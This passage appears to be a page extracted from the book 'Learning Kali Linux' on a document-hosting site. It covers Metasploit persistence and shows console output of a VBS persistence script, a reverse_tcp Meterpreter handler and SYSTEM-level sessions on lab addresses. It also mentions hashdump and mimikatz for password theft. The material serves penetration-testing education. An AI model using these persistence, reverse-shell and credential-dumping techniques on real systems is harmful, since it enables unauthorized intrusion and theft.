Learning Kali Linux




Download 22,59 Mb.
Pdf ko'rish
bet186/225
Sana14.05.2024
Hajmi22,59 Mb.
#232856
1   ...   182   183   184   185   186   187   188   189   ...   225
Bog'liq
learningkalilinux

\W
INDOWS
\T
EMP
\o
ONsSTNbNzV.vbs
[
*
]
Starting connection handler at port 
4444
for
windows/meterpreter/reverse_tcp
[
+
]
exploit/multi/handler started!
[
*
]
Executing script C:
\W
INDOWS
\T
EMP
\o
ONsSTNbNzV.vbs
[
+
]
Agent executed with PID 3864
meterpreter > 
[
*
]
Meterpreter session 
2
opened 
(
192.168.86.30:4444 ->
192.168.86.57:1046
)
at 2018-02-12 07:14:03 -0700
[
*
]
Meterpreter session 
3
opened 
(
192.168.86.30:4444 -> 192.168.86.47:33214
)
at
2018-02-12 07:14:07 -0700
[
*
]
192.168.86.47 - Meterpreter session 
3
closed. Reason: Died
Background session 1? 
[
y/N
]
msf exploit
(
windows/smb/ms08_067_netapi
)
> sessions
Active 
sessions
===============
Id Name Type Information
-- ---- ---- -----------
1
meterpreter x86/windows NT AUTHORITY
\S
YSTEM @ SYSTEM-C765F2
2
meterpreter x86/windows NT AUTHORITY
\S
YSTEM @ SYSTEM-C765F2
Connection
----------
Maintaining Access | 201

192.168.86.30:4444 -> 192.168.86.57:1045 
(
192.168.86.57
)
192.168.86.30:4444 -> 192.168.86.57:1046 
(
192.168.86.57
)
You will notice that I didn’t set any of the options mentioned, even though I could
have. Instead, I let the module choose the best method by using 
-A
as a parameter.
This left us with a new Meterpreter session, shown by running 
sessions
. You’ll also
note that the persistence was created using a Visual Basic script, as seen by the file
extension (
.vbs
). The one thing we don’t know from looking at this output is whether
the script will run when the user logs in or when the system boots. Either way, we
need to make sure we have a handler waiting to receive the connection attempt when
the payload starts. This module used 
exploit/multi/handler
to receive the connection.
Because the local IP address is embedded into the payload, you’ll need to make sure
the handler is always running on the system you created it on with the same IP
address each time.
You now have two pathways to persistence. There are others that you can do man‐
ually. This may be particularly necessary if you are compromising a Linux or macOS
system. You will need to determine the system initialization process (
systemd
versus
init
) and create a system service. Otherwise, you could start up a process in one of the
startup files associated with a particular user. Some of this may depend on what level
of permissions you had when you compromised the system.
Summary
While Metasploit is an exploit development framework, it has a lot of built-in capa‐
bility as well. You can do a lot from inside Metasploit without having to use external
tools. It can take some time to get used to everything that is available in Metasploit,
but the time invested is worth it. Here are some key ideas to take away from this
chapter:
• Metasploit has modules that can be used to scan for targets, though you can also
call 
nmap
directly from Metasploit by using 
db_nmap
.
• Metasploit maintains information about services, hosts, loot, and other artifacts
in a database that can be queried.
• Metasploit modules can be used to scan and exploit systems, but you’ll need to
set targets and options.
• The Meterpreter shell can be used to interact with the exploited system by using
OS-agnostic commands.
• Meterpreter’s 
hashdump
as well as the 
mimikatz
module can be used to grab pass‐
words.
• Meterpreter can be used to upload files, including programs to run on the remote
system.

Download 22,59 Mb.
1   ...   182   183   184   185   186   187   188   189   ...   225




Download 22,59 Mb.
Pdf ko'rish